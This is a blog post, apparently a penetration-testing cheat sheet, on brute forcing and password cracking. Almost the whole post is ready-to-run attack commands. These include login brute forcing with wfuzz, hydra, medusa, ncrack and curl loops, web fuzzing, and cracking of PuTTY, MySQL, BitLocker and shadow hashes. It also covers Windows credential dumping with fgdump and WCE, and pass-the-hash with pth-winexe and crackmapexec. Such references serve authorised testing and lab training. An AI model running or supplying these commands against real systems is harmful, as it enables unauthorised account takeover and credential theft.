Good Post: Bruteforcing using Custom Scripts
Crunch: crunch 8 8 -t Any_Characers -o list.txt if you want to create something like Bha!!123 crunch 8 8 -t ,@@^^%%% , = Upper case letter @=lower case letters ^ = special characters %= numbers
Generating Wordlist using kwprocessor
this is used for generating random passwords that users might use as a streak on the keyboard
example: qwertyuiop[]\
git clone https://github.com/hashcat/kwprocessor.git
#Create a keyword based on routes users use to create passwords
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt
Fuzzing for Webpages wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 #show all responses except 404; -s --> negative responses gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404 #Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors gobuster fuzz -k --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404 #Fuzzing using dirsearch dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404
Fuzzing Webpages using bash
for id in $(seq 1 10000); do echo "http://www.xyz.com/index.php?id=$id" done
Bruteforcing kerberos Github Usernames Github Kerbrute ./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193
Subdomain Brute Force
wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb
*All Wordlists are from SecLists
Check for Non Existing responses, example 28 Words, so Lets grep out resposes which gives out 28 Words as output
wfuzz -hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb
add the found url's to /etc/hostsSubDomain Bruteforce using wfuzz
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.bhanu.notes" –u http://10.10.10.10/ --hc 400,301 -t 50 -c
Fuzzing using Wget
#do not crawl the pages ending with the extensions, -R
wget -nd -r -R html,asp,php,aspx -P wordlist.txt hackingdream.net
# crawl the pages ending with the extensions, -A
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt hackingdream.net
Cewl for emails in the webpage
cewl -n -e http://10.10.10.10 > emails.txt
Bruteforcing Passwords - POST Using WFuzz Intercept the admin login page request after entering Username and password & copy the FORM-LOGIN data
or
Firefox --> go to login page --> hit f12 --> network --> enter creds --> submit --> select POST request on network tab
--> headers tab --> click on "resend" and select "Edit and Resend" --> from there you can find the request body
use it for -d option
wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt Reference
Bruteforcing Passwords - POST Using WFuzz
wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c
wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt
wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -d "user=admin&password=FUZZ" -z file,rockyou.txt
wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401
Cheatsheet Cheatsheet-2
Brute Forcing Passwords using Curl
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done -------------------------------------------------------
if [ $# -ne 1 ];then
echo "Usage: ./script <input-file>"
exit 1
fi
while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
fi
done < $1 ----------------------------------------- url="http://foo.dev/login" for user in $(userlist_gen); do for pass in $(passlist_gen); do http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -eq 302 ]]; then echo "Success: User: '$user' Pass: '$pass'" break 2 fi done done -------------------------------------------- WORKS GOOD ------------------------------------------ url="https://172.23.161.130/console" for pass in $(cat /usr/share/wordlists/rockyou.txt); do http_code=$(curl -k $url -u root:"$pass" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -ne 401 ]]; then echo "Success: User: root, Pass: '$pass'" break 2 else echo "Wrong Password Root:$pass" fi done done
WPSCAN: wpscan --url http://192.168.0.107 -P Wordlist.txt -U wordlist.txt -t 20
wpscan --url http://10.40.10.10/ -e ap,t,u
Hydra: hydra -l admin -P wordlist.txt -v VICTIM_IP ftp hydra -l username -P password_file.txt -s port -f ip_address request_method /path hydra -l admin -P 1000_common_passwords.txt -s 8080-f 10.10.10.10 http-get /index.html For Wordpress: hydra -L wordlist.txt -P wordlist.txt localhost -V 192.168.0.107 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:invalid"hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator
patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401
Cracking Putty Private Key.ppk
sudo apt install putty-tools
#Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa
putty2john private.ppk > hash
john --format=PuTTY --fork=4 hash -w=wordlist.txt
#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa
Cracking mysql Hashes
mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;
#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1
hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John
john --format=bitlocker-opencl -mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hashPWDUMP/fgdump: Used to Dump Windows Passwords, Needs Admin Privileges to work.
you can also use bitcracker
Cracking Recovery key with JTR
just run fgdump.exe in cmd and hashes get dumped onto a text file.
/etc/shadow Hashes
if the hashes start with
$1$ - MD5
_ - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$ - SHA-256
$6$ - SHA-512
Windows Credential Editor(WCE):
wce64.exe -w
Passing the Hash to login to windows:
pth-winexe
export SMBHASH=Copy_the_NTLM_Hash_FROM_fgdump
pthwinexe -U administrator% //Victim_IP cmd
Pass the Password crackmapexec IP_Address -u username -d domain_name -p password crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1 Pass the Hash Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243:: #copy the last set of hash crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local
Password Profiling:
Creating Wordlists from a webpage or any source.
cewl www.website.com -m 6 -w /root/wordlist-cewl.txt
Password Mutation: nano /etc/john/john.conf $[0-9]$[0-9] /Adding a rule in John to add 2 numbers after each word john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt /Apply these rules to existing passwords
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:
ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
/Multiple Threads should not be used
LM and NTLM Hashes:
-------------------
NT based till 2003 stored 2 diff hashes -> Lan Manager and NTLan manager
LM Hashing: weak, password longer than 7 chars are split into 2 strings
-----------
password is converted to uppercase before being hashed. each part is hashed seperately,
no Salts --> prone to Rainbow tables attack
NTLM Hashing: Started from Windows Vista; SAM
--------------
Comments
Post a Comment